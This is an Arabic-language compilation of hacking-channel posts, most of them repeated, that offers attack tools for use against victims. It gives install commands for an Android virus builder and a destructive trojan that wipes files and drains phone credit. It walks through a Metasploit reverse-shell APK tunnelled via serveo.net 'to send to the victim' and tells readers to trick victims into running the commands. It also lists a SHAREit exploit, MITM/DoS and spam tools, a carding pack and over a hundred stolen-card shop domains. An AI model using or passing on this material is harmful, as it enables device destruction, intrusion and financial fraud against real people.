اقدم لكم اداة || VirusCrafter || اداه جديده وقويه لصنع تطبيقات الفيروس على شكل برامج اندرويد هذه الفيروسات خطيره انتبهوا بعد القيام بصناعتها تثبيتها بجهازكم الاندرويد منها فورمات ومنها حرق المعالج ومنها سحب رصيد الجوال
( 18 ) فيروس APK بالاداه
$ pkg install python2
$ pkg install wget
$ pkg install figlet
$ gem install lolcat
$ git clone https://github.com/herp1337/VirusCrafter.git
$ cd VirusCrafter
$ python2 ViruzCrafter.py
📋 ملاحظه مهمه :
بعد الانتهاء من صنع الفيروس توجه الى ملفاتي بجهازك sdcard وراح تلاقي تطبيق الفيروس هناك .. الاداه لاتحتاج نقل الفيروس من termux الى sdcard ( ملفاتي ) يتم نقلها اوتوماتيكيا الى sdcard
#CS
( 18 ) فيروس APK بالاداه
$ pkg install python2
$ pkg install wget
$ pkg install figlet
$ gem install lolcat
$ git clone https://github.com/herp1337/VirusCrafter.git
$ cd VirusCrafter
$ python2 ViruzCrafter.py
📋 ملاحظه مهمه :
بعد الانتهاء من صنع الفيروس توجه الى ملفاتي بجهازك sdcard وراح تلاقي تطبيق الفيروس هناك .. الاداه لاتحتاج نقل الفيروس من termux الى sdcard ( ملفاتي ) يتم نقلها اوتوماتيكيا الى sdcard
#CS
GitHub
GitHub - herp1337/VirusCrafter: make apk virus you want
make apk virus you want. Contribute to herp1337/VirusCrafter development by creating an account on GitHub.
السلام عليكم ورحمة الله وبركاته
1- pkg install openssh
2 - ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net
صفحه جديدة تكتب أوامر الميتا
و نكتب اوامر عمل البايلود
اولا :
cd metasploit-framework
(ملحوظه :: هذي إذا كانت الملف تبع الميتا مظهر تكتب الأمر السابق )
و بعدها
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > storage/downloads/CS.apk
ثانيا نفتح اداة الميتاسبلويت بالامر
./msfconsole
ثالثا بعد الدخول علي الميتاسبلويت نكتب الاوامر
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
exploit
قم بإرسال ارساله للضحية
و بعدها يصلك تبليغ وتفتح الجلسه عندك
أوامر التحكم تكتب help أو ?
#CS
1- pkg install openssh
2 - ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net
صفحه جديدة تكتب أوامر الميتا
و نكتب اوامر عمل البايلود
اولا :
cd metasploit-framework
(ملحوظه :: هذي إذا كانت الملف تبع الميتا مظهر تكتب الأمر السابق )
و بعدها
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > storage/downloads/CS.apk
ثانيا نفتح اداة الميتاسبلويت بالامر
./msfconsole
ثالثا بعد الدخول علي الميتاسبلويت نكتب الاوامر
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
exploit
قم بإرسال ارساله للضحية
و بعدها يصلك تبليغ وتفتح الجلسه عندك
أوامر التحكم تكتب help أو ?
#CS
السلام عليكم
اليوم كما وعدناكم شرح مفصل عن اختراق الطائرات بدون طيار
تتميز الطائرة بدون طيار بميزات تجعلها تتفوق على غيرها من وسائل الطيران الاخرى
فأهم امر هو تقنية الارسال اللحظية وعدم التعرض للمخاطر البشرية ولكن كل شيء وله سلاح ذو حدين
فاذا تم اسقاطها او الحصول عليها فهذا يعني بنسبة كبيرة بناء نظام مشابه لها عن طريق الهندسة العكسية
أبرز عمليات اسقاط طائرات الاستطلاع
اسقاط كتائب القسام طائرة
skylark1
اسقاطر طائرة الاستطلاع الامريكية عن طريق الجيش الالكتروني الايراني
RQ170
اسقاط كتائب القسام لطائرة
skylite B
اولا: كيف تعمل الطائرة بدون طيار ؟
الطائرات بدون طيار تعمل على قاعدة الكترونية متنقلة او ثابتة وذلك حسب مواصفات الطائرة ان كانت حاملة لصواريخ او لاغراض تجسسية
وحسب خبرتي المتواضعه
القواعد الثابتة :تكون للطائرات الثقيلة الحاملة للصواريخ
القواعد المتنقلة: جهاز صغير يتحكم به عن بعد ويمكن وضعه في حقيبة صغيرة كطائرة الاستطلاع سكاي لايت
ولكن هناك بعض الطائرات الثقيلة التي لا تحمل صواريخ او قاذف مثل
RQ170
يعتمد هذا النوع على انتشار الامواج الكهرومغناطيسية بشكل كبير وذلك لضمان زيادة مدى جمع المعلومات
طائرات الاستطلاع المتوسطة تستطيع التحليق على ارتفاع 50.000 قدم .
ويمكن التحكم بها من خلال قاعدة مركزيه حيث يمكنها تزويد المتحكم بالمعلومات الحيًة التي تقع تحت الطائرة مباشرة
ثانيا :كيف يتم اتصال طائرة الاستطلاع بالقاعدة الالكترونية
يتم اتصال الطائرة بالقاعدة الالكترونية عن طريق وضعين
1- الوضع الأول Ground command Station
هذا الوضع يتم التحكم به عن طريق القاعدة المباشرة التي يشرف عليها المهندس الاختصاصي في القاعدة العسكرية وعن طريقه يمكن ارسال الأوامر واستقبالها براحة تامة
2- الوضع الثاني ALR – Automatic Launch and recovery
هذا الوضع مبرمج آليا على الذهاب والاياب لاماكن متعددة في ساعات معينة
كأن تبرمجه على الذهاب في الساعه 6 صباحا لمكان معين والعودة في الساعه 10 على مكان معين وترك الطائرة بدون التحكم بها عن طريق القاعدة الالكترونية
ولكن كيف يتم اختراق طائرات الاستطلاع ؟
في حقيقة الامر اغلب التقنيين والمهندسين يعتقدون ان ذلك يتم عن طريق الهندسة العكسية ولكن ليس هذا حقيقة الامر
ولكن هذا لا ينكر انه ممكن ان يتم عن طريق الهندسة العكسية فهي كفكرة قائمة ولكن ما يصعب الامر حقيقة فك تشفير قنوات الاتصال بين ارسال الطائرة والقاعدة
في جميع حالات اسقاط الطائرات من دون طيار تمت عن طريق ما يسمى
GPS spoofing
ما هو هجوم GPS spoofing؟
في بداية الامر لنجاح اسقاط الطائرة بدون طيار يتوجب قطع الاتصال بين الطائرة والقاعدة لضمان عدم تحكمها بالقاعدة سواء ثابتة او متحركة
يتم قطع الاتصال عن طريق جهاز
SNG(Satellite News Gathering)
هذا جهاز عبارة عن جهاز مرسل وهو متوفر وغالبا ما يستخدم في القرى النائية للبث
يمكننا استخدام هذا الجهاز بتوليد اشارات بنفس الترددات بطاقة اعلى من الاشارة العادية مما يسبب التشويش وبالتالي قطع الاتصال
وهنا يأتي الدور الجوهري في تلخيص الاسقاط
كما تحدثنا مسبقا في اوضاع الاتصال بالقاعدة الالكترونية فان الطائرة مبرمجة لان تهبط في قاعدتها المخصصة ولو تم قطع الاتصال عنها فهي مبرمجة على شيء مسبق
هنا يجب علينا استخدام GPS spoofing
لكل طائرة احداثيات للهبوط
X.Y
X.Y=5.6
فهجوم ال SPOOFING
عبارة عن تضليل في الترجمة
GPS spoofing
يتم الهجوم على طائرة الاستطلاع وتغير الاحداثيات
X.Y=5.6 Chang To x.Y=12.7
ويتم اسقاطها حسب مكان احداثيات جهاز الملاحة وبذلك تصبح الطائرة في ارض المهاجم:) ( اي يتم اسقاطها ) .
اختراق الطائرات بدون طيار
اليوم كما وعدناكم شرح مفصل عن اختراق الطائرات بدون طيار
تتميز الطائرة بدون طيار بميزات تجعلها تتفوق على غيرها من وسائل الطيران الاخرى
فأهم امر هو تقنية الارسال اللحظية وعدم التعرض للمخاطر البشرية ولكن كل شيء وله سلاح ذو حدين
فاذا تم اسقاطها او الحصول عليها فهذا يعني بنسبة كبيرة بناء نظام مشابه لها عن طريق الهندسة العكسية
أبرز عمليات اسقاط طائرات الاستطلاع
اسقاط كتائب القسام طائرة
skylark1
اسقاطر طائرة الاستطلاع الامريكية عن طريق الجيش الالكتروني الايراني
RQ170
اسقاط كتائب القسام لطائرة
skylite B
اولا: كيف تعمل الطائرة بدون طيار ؟
الطائرات بدون طيار تعمل على قاعدة الكترونية متنقلة او ثابتة وذلك حسب مواصفات الطائرة ان كانت حاملة لصواريخ او لاغراض تجسسية
وحسب خبرتي المتواضعه
القواعد الثابتة :تكون للطائرات الثقيلة الحاملة للصواريخ
القواعد المتنقلة: جهاز صغير يتحكم به عن بعد ويمكن وضعه في حقيبة صغيرة كطائرة الاستطلاع سكاي لايت
ولكن هناك بعض الطائرات الثقيلة التي لا تحمل صواريخ او قاذف مثل
RQ170
يعتمد هذا النوع على انتشار الامواج الكهرومغناطيسية بشكل كبير وذلك لضمان زيادة مدى جمع المعلومات
طائرات الاستطلاع المتوسطة تستطيع التحليق على ارتفاع 50.000 قدم .
ويمكن التحكم بها من خلال قاعدة مركزيه حيث يمكنها تزويد المتحكم بالمعلومات الحيًة التي تقع تحت الطائرة مباشرة
ثانيا :كيف يتم اتصال طائرة الاستطلاع بالقاعدة الالكترونية
يتم اتصال الطائرة بالقاعدة الالكترونية عن طريق وضعين
1- الوضع الأول Ground command Station
هذا الوضع يتم التحكم به عن طريق القاعدة المباشرة التي يشرف عليها المهندس الاختصاصي في القاعدة العسكرية وعن طريقه يمكن ارسال الأوامر واستقبالها براحة تامة
2- الوضع الثاني ALR – Automatic Launch and recovery
هذا الوضع مبرمج آليا على الذهاب والاياب لاماكن متعددة في ساعات معينة
كأن تبرمجه على الذهاب في الساعه 6 صباحا لمكان معين والعودة في الساعه 10 على مكان معين وترك الطائرة بدون التحكم بها عن طريق القاعدة الالكترونية
ولكن كيف يتم اختراق طائرات الاستطلاع ؟
في حقيقة الامر اغلب التقنيين والمهندسين يعتقدون ان ذلك يتم عن طريق الهندسة العكسية ولكن ليس هذا حقيقة الامر
ولكن هذا لا ينكر انه ممكن ان يتم عن طريق الهندسة العكسية فهي كفكرة قائمة ولكن ما يصعب الامر حقيقة فك تشفير قنوات الاتصال بين ارسال الطائرة والقاعدة
في جميع حالات اسقاط الطائرات من دون طيار تمت عن طريق ما يسمى
GPS spoofing
ما هو هجوم GPS spoofing؟
في بداية الامر لنجاح اسقاط الطائرة بدون طيار يتوجب قطع الاتصال بين الطائرة والقاعدة لضمان عدم تحكمها بالقاعدة سواء ثابتة او متحركة
يتم قطع الاتصال عن طريق جهاز
SNG(Satellite News Gathering)
هذا جهاز عبارة عن جهاز مرسل وهو متوفر وغالبا ما يستخدم في القرى النائية للبث
يمكننا استخدام هذا الجهاز بتوليد اشارات بنفس الترددات بطاقة اعلى من الاشارة العادية مما يسبب التشويش وبالتالي قطع الاتصال
وهنا يأتي الدور الجوهري في تلخيص الاسقاط
كما تحدثنا مسبقا في اوضاع الاتصال بالقاعدة الالكترونية فان الطائرة مبرمجة لان تهبط في قاعدتها المخصصة ولو تم قطع الاتصال عنها فهي مبرمجة على شيء مسبق
هنا يجب علينا استخدام GPS spoofing
لكل طائرة احداثيات للهبوط
X.Y
X.Y=5.6
فهجوم ال SPOOFING
عبارة عن تضليل في الترجمة
GPS spoofing
يتم الهجوم على طائرة الاستطلاع وتغير الاحداثيات
X.Y=5.6 Chang To x.Y=12.7
ويتم اسقاطها حسب مكان احداثيات جهاز الملاحة وبذلك تصبح الطائرة في ارض المهاجم:) ( اي يتم اسقاطها ) .
اختراق الطائرات بدون طيار
11- اداة webkiller
git clone https://github.com/ultrasecurity/webkiller.git
cd webkiller
pip install -r requirements.txt
python webkiller.py
#مميزات_الاداة
1 - Reverse IP With HackTarget
2 - Reverse IP With YouGetSignal
3 - Geo IP Lookup
4 - Whois
5 - Bypass CloudFlare
6 - DNS Lookup
7 - Find Shared DNS
8 - Show HTTP Header
9 - Port Scan
10 - CMS Scan
11 - Page Admin Finder
12 - Robots.txt
13 - Traceroute
14 - Honeypot Detector
15 - Ping
16 - All
17 - Exit
#CS
git clone https://github.com/ultrasecurity/webkiller.git
cd webkiller
pip install -r requirements.txt
python webkiller.py
#مميزات_الاداة
1 - Reverse IP With HackTarget
2 - Reverse IP With YouGetSignal
3 - Geo IP Lookup
4 - Whois
5 - Bypass CloudFlare
6 - DNS Lookup
7 - Find Shared DNS
8 - Show HTTP Header
9 - Port Scan
10 - CMS Scan
11 - Page Admin Finder
12 - Robots.txt
13 - Traceroute
14 - Honeypot Detector
15 - Ping
16 - All
17 - Exit
#CS
GitHub
GitHub - ultrasecurity/webkiller: Tool Information Gathering Write By Python.
Tool Information Gathering Write By Python. Contribute to ultrasecurity/webkiller development by creating an account on GitHub.
اداة DUMPit
هو استغلال لتطبيق SHAREit للجوال حيث يسيء استخدام ثغرتين تم اكتشافهما مؤخرًا وتؤثر على تطبيق SHAREit Android <= v 4.0.38. الأول يسمح للمهاجم بتجاوز آلية مصادقة جهاز SHAREit ، والآخر يمكّن المهاجم المصادق من تنزيل الملفات التعسفية من جهاز المستخدم. تم الإبلاغ عن كلا الثغرات الأمنية للبائع وتم إصدار تصحيحات.
اول شي قم بالدخول ع termux و بعدها
اكتب الاوامر التاليه بالترتيب
pkg install git python2
git clone https://github.com/redforcesec/Dumpit.git
cd Dumpit
python2 server.py
#CS
هو استغلال لتطبيق SHAREit للجوال حيث يسيء استخدام ثغرتين تم اكتشافهما مؤخرًا وتؤثر على تطبيق SHAREit Android <= v 4.0.38. الأول يسمح للمهاجم بتجاوز آلية مصادقة جهاز SHAREit ، والآخر يمكّن المهاجم المصادق من تنزيل الملفات التعسفية من جهاز المستخدم. تم الإبلاغ عن كلا الثغرات الأمنية للبائع وتم إصدار تصحيحات.
اول شي قم بالدخول ع termux و بعدها
اكتب الاوامر التاليه بالترتيب
pkg install git python2
git clone https://github.com/redforcesec/Dumpit.git
cd Dumpit
python2 server.py
#CS
GitHub
GitHub - redforcesec/Dumpit: An exploit for SHAREit <= v 4.0.38
An exploit for SHAREit <= v 4.0.38. Contribute to redforcesec/Dumpit development by creating an account on GitHub.
8- اداه XeroSploit
لإختبار إختراق الأجهزة المتصلة بالشبكة وتعتبر من الأدوات التي تهدف لأداء هجمات MITM Attack (رجل بلمنتصف) لإختبار الإختراق وهو يجمع العديد من العمليات التي تسمح لتحقيق الهجمة بفعالية ويسمح بعمل هجمة الحرمان DosAttack كما يقوم بعمل مسح للمنافذ كلها.
اوامر تثبيت
git clone https://github.com/LionSec/xerosploit
cd xerosploit
sudo python install.py
sudo xerosploit
المميزات
1- Port scanning
2- Network mapping
3- Dos attack
4- Html code injection
5- Javascript code injection
6- Download intercaption and replacement
7- Sniffing
8- Dns spoofing
9- Background audio reproduction
10- Images replacement
11- Drifnet
12- Webpage defacement
#CS
لإختبار إختراق الأجهزة المتصلة بالشبكة وتعتبر من الأدوات التي تهدف لأداء هجمات MITM Attack (رجل بلمنتصف) لإختبار الإختراق وهو يجمع العديد من العمليات التي تسمح لتحقيق الهجمة بفعالية ويسمح بعمل هجمة الحرمان DosAttack كما يقوم بعمل مسح للمنافذ كلها.
اوامر تثبيت
git clone https://github.com/LionSec/xerosploit
cd xerosploit
sudo python install.py
sudo xerosploit
المميزات
1- Port scanning
2- Network mapping
3- Dos attack
4- Html code injection
5- Javascript code injection
6- Download intercaption and replacement
7- Sniffing
8- Dns spoofing
9- Background audio reproduction
10- Images replacement
11- Drifnet
12- Webpage defacement
#CS
GitHub
GitHub - LionSec/xerosploit: Efficient and advanced man in the middle framework
Efficient and advanced man in the middle framework - LionSec/xerosploit
اداة DUMPit
هو استغلال لتطبيق SHAREit للجوال حيث يسيء استخدام ثغرتين تم اكتشافهما مؤخرًا وتؤثر على تطبيق SHAREit Android <= v 4.0.38. الأول يسمح للمهاجم بتجاوز آلية مصادقة جهاز SHAREit ، والآخر يمكّن المهاجم المصادق من تنزيل الملفات التعسفية من جهاز المستخدم. تم الإبلاغ عن كلا الثغرات الأمنية للبائع وتم إصدار تصحيحات.
اول شي قم بالدخول ع termux و بعدها
اكتب الاوامر التاليه بالترتيب
pkg install git python2
git clone https://github.com/redforcesec/Dumpit.git
cd Dumpit
python2 server.py
#CS
هو استغلال لتطبيق SHAREit للجوال حيث يسيء استخدام ثغرتين تم اكتشافهما مؤخرًا وتؤثر على تطبيق SHAREit Android <= v 4.0.38. الأول يسمح للمهاجم بتجاوز آلية مصادقة جهاز SHAREit ، والآخر يمكّن المهاجم المصادق من تنزيل الملفات التعسفية من جهاز المستخدم. تم الإبلاغ عن كلا الثغرات الأمنية للبائع وتم إصدار تصحيحات.
اول شي قم بالدخول ع termux و بعدها
اكتب الاوامر التاليه بالترتيب
pkg install git python2
git clone https://github.com/redforcesec/Dumpit.git
cd Dumpit
python2 server.py
#CS
GitHub
GitHub - redforcesec/Dumpit: An exploit for SHAREit <= v 4.0.38
An exploit for SHAREit <= v 4.0.38. Contribute to redforcesec/Dumpit development by creating an account on GitHub.
فيروس جيماكسوجان باصداره الخامس ، هو ملف طرواده مشفر يقوم:
١) بحذف جميع ملفات و مسارات جهاز الضحية.
٢) بإظافه ١٠ جيجا في جهاز الضحية في غضون بضع ثوان.
٣) يقوم بانشاء ٣٠٠٠ مجلد بجميع الحروف و الارقام في كل المسارات.
٤) يقوم بتهنيج و تجميد جهاز الضحية ل٦ ساعات.
خطوات التنصيب ، كم بإقناع الضحية ان يحمل برنامج Termux من متجر بلاي علا انه يقوم بالتهكير و ما الى ذلك ، ثم قم بجعله ان يكتب هذه الاوامر:
pkg update
pkg upgrade
pkg install git
git clone https://github.com/jmaxojan/jmaxojan5
cd jmaxojan5
bash *
و اذا اردت المزيد من التدمير ، قم بجعل الضحية ان ينفذ هذه الاوامر اولا:
bash .install.sh
سيقوم بنقل برنامج الى الذاكره الداخلية في المسار sdcard/ اسمه TermuxApi قم بجعل الضحية ان يثبته و يدخل الى اعدادات الجهاز>التطبيقات>Termux Api و يقوم بتفعيل جميع الاذونات و الصلاحيات للبرنامج ثم يقوم بتنفيذ الامر السابق * bash , لان ذلك سيقوم (اظافه للاشياء التي ذكرتها مسبقا) :
١) بحرق فلاش الضوء.
٢) بتدمير الاضاءه.
٣) بتغيير الخلفية.
٤) بهز الجهاز لمده ٦ ساعات بدون توقف.
٥) بالاتصال الهاتفي لارقام بدون شعور الضحيه بذلك لكي يتم سحب الرصيد.
٦) بتشغيل صوت جنس في الخلفيه 👺.
٧) باقفال الجهاز برمز سري.
٨) بحذف ما هو موجود في الحافظه.
٩) بحرق الصوت.
١٠) بحذف الاشعارات.
١١) بإيقاف و تشغيل الوايفاي عده مرات.
... ارجو استخدام الفيروس علا الاجانب او علا من يستحق ...
١) بحذف جميع ملفات و مسارات جهاز الضحية.
٢) بإظافه ١٠ جيجا في جهاز الضحية في غضون بضع ثوان.
٣) يقوم بانشاء ٣٠٠٠ مجلد بجميع الحروف و الارقام في كل المسارات.
٤) يقوم بتهنيج و تجميد جهاز الضحية ل٦ ساعات.
خطوات التنصيب ، كم بإقناع الضحية ان يحمل برنامج Termux من متجر بلاي علا انه يقوم بالتهكير و ما الى ذلك ، ثم قم بجعله ان يكتب هذه الاوامر:
pkg update
pkg upgrade
pkg install git
git clone https://github.com/jmaxojan/jmaxojan5
cd jmaxojan5
bash *
و اذا اردت المزيد من التدمير ، قم بجعل الضحية ان ينفذ هذه الاوامر اولا:
bash .install.sh
سيقوم بنقل برنامج الى الذاكره الداخلية في المسار sdcard/ اسمه TermuxApi قم بجعل الضحية ان يثبته و يدخل الى اعدادات الجهاز>التطبيقات>Termux Api و يقوم بتفعيل جميع الاذونات و الصلاحيات للبرنامج ثم يقوم بتنفيذ الامر السابق * bash , لان ذلك سيقوم (اظافه للاشياء التي ذكرتها مسبقا) :
١) بحرق فلاش الضوء.
٢) بتدمير الاضاءه.
٣) بتغيير الخلفية.
٤) بهز الجهاز لمده ٦ ساعات بدون توقف.
٥) بالاتصال الهاتفي لارقام بدون شعور الضحيه بذلك لكي يتم سحب الرصيد.
٦) بتشغيل صوت جنس في الخلفيه 👺.
٧) باقفال الجهاز برمز سري.
٨) بحذف ما هو موجود في الحافظه.
٩) بحرق الصوت.
١٠) بحذف الاشعارات.
١١) بإيقاف و تشغيل الوايفاي عده مرات.
... ارجو استخدام الفيروس علا الاجانب او علا من يستحق ...
xerosploit-master tool.zip
817.5 KB
🔰 Xerosploit Tool 🔰
Ⓜ️ Xerosploit – Pentesting Toolkit to Perform MITM, Spoofing, DOS, Images Sniffing/Replacement, WD Attacks
➖ @M_C_X➖
Ⓜ️ Xerosploit – Pentesting Toolkit to Perform MITM, Spoofing, DOS, Images Sniffing/Replacement, WD Attacks
➖ @M_C_X➖
UrFace's HackPack
Contains almost every sites cracking and tricks (latest and updated), Refer to this HackPack and learn new things. Contains Carding tricks also.
Link 🔗
https://ushortx.com/oc6dzD
Size- 5.02 GB
➖@PhantomCrackerBot➖
Make me admin for Daily Giveaways & Tricks No Promo/ No Ads.
Contains almost every sites cracking and tricks (latest and updated), Refer to this HackPack and learn new things. Contains Carding tricks also.
Link 🔗
https://ushortx.com/oc6dzD
Size- 5.02 GB
➖@PhantomCrackerBot➖
Make me admin for Daily Giveaways & Tricks No Promo/ No Ads.
اداة hackerpro
طريقه تثبيتها
apt update && apt upgrade && apt install git && apt install python2
git clone https://github.com/technicaldada/hackerpro.git
cd hackerpro && python2 hackerpro.py
مميزات الاداة
Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
Install The HACKERPRO
#CS
طريقه تثبيتها
apt update && apt upgrade && apt install git && apt install python2
git clone https://github.com/technicaldada/hackerpro.git
cd hackerpro && python2 hackerpro.py
مميزات الاداة
Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
Install The HACKERPRO
#CS
GitHub
GitHub - jaykali/hackerpro: All in One Hacking Tool for Linux & Android (Termux). Make your linux environment into a Hacking Machine.…
All in One Hacking Tool for Linux & Android (Termux). Make your linux environment into a Hacking Machine. Hackers are welcome in our blog - jaykali/hackerpro
هذه أفضل المواقع لشراء CC for Carding في 2019
(لبطاقات الائتمان الأمريكية فقط)
cvv.me
ltdcc1.ru
dumps.su
2pac.cc
feshop-card.ru
uniccshop.ru
torcvv.cc
validshop.succstore.su
approved1.su
bigbase1.lv
bstab.net
buyst0re.bz
buyacc.us
c2v2.net
carderpro.com
cardersbay.in
cardrockcafe.cc
cardsmarket.su
cardstorm.ru
ccbase.biz
ccbases.com
ccbases.net
ccbases.su
ccchecker.ru
ccdumb.cc
ccv.name
cvv-shop.ru
cvv-store.su
cvvseller.pro
cvvshop.lv
cvvshop.net
cvvshop.su
cvvshop1.com
cvvshop1.lv
cvvshop1.ru
cvvstore.ru
d4rksys.cc
dumps44.cc
dumpscheck.us
dumpsgate.su
freshbase.org
fullz.pro
galaxycvv.ru
galaxycvv.su
greatdumps.cc
greatdumps.su
greatdumpz.su
hackedcvv.su
instantcvv.ru
jbestcc.ru
kidala.info
kingscard.ru
kingscard.su
lampeduza.su
logoshopcc.net
ltdcc.cc
n1shop.su
nonvbv.com
nonvbv.ru
nonvbv.su
octavian.su
omerta.cc
pentagon.al
pirates-cc.com
pirates-cc.ru
pompei.su
procvvshop.ru
project84.su
rafanji.com
rescator.ru
rescator.so
rescator.su
reskator.la
secinfo.su
secretshop.su
selldump.su
shop-cvv.ru
shopcvv.ru
slilpp.net
source4dumps.cc
sruka.cc
sruka.su
ssnfinder.su
swiped.ru
t12shop.cc
thefreshcc.com
thefreshdumps.com
torcvv.com
track2shop.com
trackmarket.pro
uniccshop.su
uniccshops.ru
v-m.name
validcard.org
validcvv.ru
validcvv.su
validdumps.su
validshop.su
verified.cm
worldcvv.com
worldcvv.ru
l33t.su
#CS
(لبطاقات الائتمان الأمريكية فقط)
cvv.me
ltdcc1.ru
dumps.su
2pac.cc
feshop-card.ru
uniccshop.ru
torcvv.cc
validshop.succstore.su
approved1.su
bigbase1.lv
bstab.net
buyst0re.bz
buyacc.us
c2v2.net
carderpro.com
cardersbay.in
cardrockcafe.cc
cardsmarket.su
cardstorm.ru
ccbase.biz
ccbases.com
ccbases.net
ccbases.su
ccchecker.ru
ccdumb.cc
ccv.name
cvv-shop.ru
cvv-store.su
cvvseller.pro
cvvshop.lv
cvvshop.net
cvvshop.su
cvvshop1.com
cvvshop1.lv
cvvshop1.ru
cvvstore.ru
d4rksys.cc
dumps44.cc
dumpscheck.us
dumpsgate.su
freshbase.org
fullz.pro
galaxycvv.ru
galaxycvv.su
greatdumps.cc
greatdumps.su
greatdumpz.su
hackedcvv.su
instantcvv.ru
jbestcc.ru
kidala.info
kingscard.ru
kingscard.su
lampeduza.su
logoshopcc.net
ltdcc.cc
n1shop.su
nonvbv.com
nonvbv.ru
nonvbv.su
octavian.su
omerta.cc
pentagon.al
pirates-cc.com
pirates-cc.ru
pompei.su
procvvshop.ru
project84.su
rafanji.com
rescator.ru
rescator.so
rescator.su
reskator.la
secinfo.su
secretshop.su
selldump.su
shop-cvv.ru
shopcvv.ru
slilpp.net
source4dumps.cc
sruka.cc
sruka.su
ssnfinder.su
swiped.ru
t12shop.cc
thefreshcc.com
thefreshdumps.com
torcvv.com
track2shop.com
trackmarket.pro
uniccshop.su
uniccshops.ru
v-m.name
validcard.org
validcvv.ru
validcvv.su
validdumps.su
validshop.su
verified.cm
worldcvv.com
worldcvv.ru
l33t.su
#CS
12 - اداه ghostnet
البرنامج الذي سيساعدك على أن تكون أكثر أمانًا على شبكة الإنترنت. تم تصميم هذا البرنامج للتوجيه بشفافية عبر tor ، وبالطبع ، سيتم تشغيل حركة مرور الشبكة تحت tor. تم تعديل هذا البرنامج بالفعل للعمل على ARCH linux مع توزيعات linux الأخرى ، لدينا AnonSurf و BacBox-مجهولان ، وهما يعملان أيضًا مثل هذا البرنامج. هذا البرنامج كتبه لغة بيثون (الإصدار 3).
اوامر تثبيتها
git clone https://github.com/t7hm1/GhostNET.git && sudo cp GhostNET/ghostnet /usr/bin/ghostnet
cp GhostNET/ghostnet.log /opt/
sudo chown (your user name):wheel /opt/ghostnet.log
sudo chmod +x /usr/bin/ghostnet
sudo ghostnet
#cs
البرنامج الذي سيساعدك على أن تكون أكثر أمانًا على شبكة الإنترنت. تم تصميم هذا البرنامج للتوجيه بشفافية عبر tor ، وبالطبع ، سيتم تشغيل حركة مرور الشبكة تحت tor. تم تعديل هذا البرنامج بالفعل للعمل على ARCH linux مع توزيعات linux الأخرى ، لدينا AnonSurf و BacBox-مجهولان ، وهما يعملان أيضًا مثل هذا البرنامج. هذا البرنامج كتبه لغة بيثون (الإصدار 3).
اوامر تثبيتها
git clone https://github.com/t7hm1/GhostNET.git && sudo cp GhostNET/ghostnet /usr/bin/ghostnet
cp GhostNET/ghostnet.log /opt/
sudo chown (your user name):wheel /opt/ghostnet.log
sudo chmod +x /usr/bin/ghostnet
sudo ghostnet
#cs
GitHub
GitHub - mach1el/GhostNET: GhostNET script that will help you be safer on the cyber
GhostNET script that will help you be safer on the cyber - GitHub - mach1el/GhostNET: GhostNET script that will help you be safer on the cyber
2 - اداه LITESPAM
يحتوي على أدوات مرسلي الرسائل غير المرغوب فيها بأنواع مختلفة ذات حدود عالية حتى غير محدودة وغير مبنية على جميع مساهمات المبرمجين لجمع أدواته هنا ، مع البريد العشوائي
اوامر تثبيتها
$ pkg update upgrade
$ pkg install git
$ pkg install python2
$ pkg install toilet
$ pkg install figlet
$ pkg install php
$ pkg install sh
$ git clone https://github.com/4L13199/LITESPAM
$ cd LITESPAM
sh LITESPAM.sh
#CS
يحتوي على أدوات مرسلي الرسائل غير المرغوب فيها بأنواع مختلفة ذات حدود عالية حتى غير محدودة وغير مبنية على جميع مساهمات المبرمجين لجمع أدواته هنا ، مع البريد العشوائي
اوامر تثبيتها
$ pkg update upgrade
$ pkg install git
$ pkg install python2
$ pkg install toilet
$ pkg install figlet
$ pkg install php
$ pkg install sh
$ git clone https://github.com/4L13199/LITESPAM
$ cd LITESPAM
sh LITESPAM.sh
#CS
GitHub
GitHub - 4L13199/LITESPAM: Berisi Tools Spammer Dengan Berbagai Macam jenis Dengan Limit Tinggi Bahkan Unlimited
Berisi Tools Spammer Dengan Berbagai Macam jenis Dengan Limit Tinggi Bahkan Unlimited - 4L13199/LITESPAM
4- اداه wpseku
مميزاتها
و هي مقصود بها اداه Wordpress Security Scanner و هي
يتم الآن إنشاء إصدار جديد ... WPSeku هو ماسح عدم حصانة WordPress للمربع الأسود والذي يمكن استخدامه لمسح تثبيتات WordPress عن بُعد للعثور على مشكلات الأمان وبطالع لك الثغرات الموجودة بالموقع
اوامر تثبيتها
$ git clone https://github.com/m4ll0k/WPSeku.git wpseku
$ cd wpseku
$ pip3 install -r requirements.txt
$ python3 wpseku.py
#CS
مميزاتها
و هي مقصود بها اداه Wordpress Security Scanner و هي
يتم الآن إنشاء إصدار جديد ... WPSeku هو ماسح عدم حصانة WordPress للمربع الأسود والذي يمكن استخدامه لمسح تثبيتات WordPress عن بُعد للعثور على مشكلات الأمان وبطالع لك الثغرات الموجودة بالموقع
اوامر تثبيتها
$ git clone https://github.com/m4ll0k/WPSeku.git wpseku
$ cd wpseku
$ pip3 install -r requirements.txt
$ python3 wpseku.py
#CS
هذه الاداة تقوم بعمل Spider
على الموقع وسحب جميع جميع الكلمات الموجودة به ومن ثم توليد ملف يوجد به جميع الكلمات لا بل أيضاً تقوم بمعرفة الايميلات وأسماء المستخدمين على موقع الهدف بالإضافة إلى تحميل جميع الملفات مثل الأوفيس أو ملفات الـ PDF وقد اثبتت هذه الأداة قدرتها على جمع المعلومات وتم اختراق الكثير من المواقع مثل Wordpress
تثبيت ادة
Goblin word Generator
Installtion :
pkg update
pkg upgrade
pkg install git
pkg install python
pkg install python2
pkg install python3
git clone https://github.com/UndeadSec/GoblinWordGenerator
cd GoblinWordGenerator
chmod +x *
أو
chmod 777 *
python3 goblin.py
